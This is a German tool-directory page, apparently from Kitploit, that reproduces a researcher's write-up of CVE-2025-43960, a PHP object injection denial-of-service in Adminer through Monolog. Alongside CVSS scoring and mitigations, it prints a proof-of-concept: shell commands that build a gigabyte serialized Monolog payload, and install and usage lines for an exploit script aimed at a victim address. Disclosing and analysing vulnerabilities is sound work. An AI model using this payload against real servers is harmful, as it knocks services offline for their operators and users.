Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-43960 — PHP-Objektinjektions-Exploit für Adminer <4.8.1 über Monolog, der einen Denial-of-Service durch manipulierte serialisierte Payloads verursacht. Enthält PoC, CVSS-Bewertung und Schadensbegrenzungsanleitung. | Kitploit
Tools/GitHubGitHub/far00t01/cve-2025-43960
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-Exploitation
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

PHP-Objektinjektions-Exploit für Adminer <4.8.1 über Monolog, der einen Denial-of-Service durch manipulierte serialisierte Payloads verursacht. Enthält PoC, CVSS-Bewertung und Schadensbegrenzungsanleitung.

Repository anzeigen
13vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-43960 - PHP Object Injection in Adminer < 4.8.1 über Monolog - Denial of Service (DoS)

Nach monatelangem Warten auf eine Antwort von MITRE habe ich CVE-2025-43960 mit einem PHP Object Injection-Angriff gegen den Adminer-Dienst (<4.8.1) erhalten, der einen Denial of Service (DoS) durch Speichermanipulation verursacht.

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

Zusammenfassung

Diese Schwachstelle ermöglicht es entfernten, nicht authentifizierten Angreifern, Adminer 4.8.1-Instanzen auszunutzen, die Monolog verwenden, und einen Denial of Service (DoS) durch PHP Object Injection zu verursachen. Der Angriffsvektor erfordert keine Authentifizierung oder Benutzerinteraktion, was ihn zu einem Problem mit hohem Schweregrad (CVSS 7.5) macht, das in bestimmten gemeinsam genutzten Umgebungen auf 8,6 ansteigen kann.

Vorgeschlagene Beschreibung

Adminer 4.8.1 ermöglicht bei Verwendung von Monolog zum Logging einen Denial of Service (Speicherverbrauch) über eine präparierte serialisierte Nutzlast wie eine mit einem s:1000000000-String, auch bekannt als PHP Object Injection-Problem. Die Schwachstelle betrifft Adminer-Instanzen, die Monolog zum Logging verwenden, bei denen nicht vertrauenswürdige Benutzereingaben ohne ordnungsgemäße Validierung deserialisiert werden. Durch das Senden eines großen deserialisierten Objekts kann ein Angreifer einen hohen Speicherverbrauch erzwingen, die Adminer-Oberfläche unansprechbar machen und einen serverweiten DoS verursachen.

  • Während sich der Server nach mehreren Minuten erholen kann, können mehrere gleichzeitige Anfragen einen vollständigen Absturz verursachen, der manuelles Eingreifen zur Wiederherstellung des Dienstes erfordert.

CVSS-Score v3.1

Basis-Score: 7.5 (Hoch)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Hinweis zu spezifischen Bereitstellungen:

Falls ein Absturz von Adminer auch andere Dienste/Mandanten stört (z.B. Container oder gemeinsam genutzter Prozess), kann Scope: Changed gelten:

  • Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • Score: 8.6 (Hoch)

Zusätzliche Informationen

Mögliche Abhilfemaßnahmen

  • Vermeiden Sie die Verwendung von unserialize() auf nicht vertrauenswürdigen Daten in Adminer und Monolog.
  • Erzwingen Sie Speicherlimits (memory_limit) in PHP, um übermäßigen Ressourcenverbrauch zu verhindern.
  • Verwenden Sie allowed_classes in unserialize(), um die Deserialisierung nicht autorisierter Klassen einzuschränken.

Anbieter des Produkts

  • Adminer

Betroffene Produktcodebasis

  • Adminer < 4.8.1 (aktuellste stabile Version zum Zeitpunkt des Tests)

Betroffene Komponente

  • Monolog-Integration in Adminer

Problematisches Merkmal

  • PHP Object Injection über unserialize()

Potenziell betroffener Bereich

  • Jede Adminer-Instanz, in der Monolog-basiertes Logging verwendet wird

Proof of Concept (PoC)

Payload generation:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

Auswirkungen:

  • Der Server wechselt in einen Ladezustand, wodurch Adminer unzugänglich wird.
  • Das Frontend verschwindet vollständig, während die Verbindung aktiv ist.
  • Wenn der Angriff aufhört, erholt sich der Server nach einigen Minuten, es sei denn, es werden mehrere Maschinen verwendet (DDoS-Szenario).

Installationsanforderungen

  • Python: Stellen Sie sicher, dass Python 3.x installiert ist. Sie können dies überprüfen, indem Sie python3 --version in Ihrem Terminal ausführen.

Python-Abhängigkeiten

  • Flask: Wird verwendet, um den lokalen HTTP-Server auszuführen, der die Nutzlast bereitstellt.
  • requests: Wird verwendet, um während des Exploit-Prozesses mit der Zielanwendung zu interagieren.

Installation

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

Nutzung des Exploits:

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

Referenzen

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

Entdecker

Fabian Rosales (@far00t01) Medium.

Tool herunterladen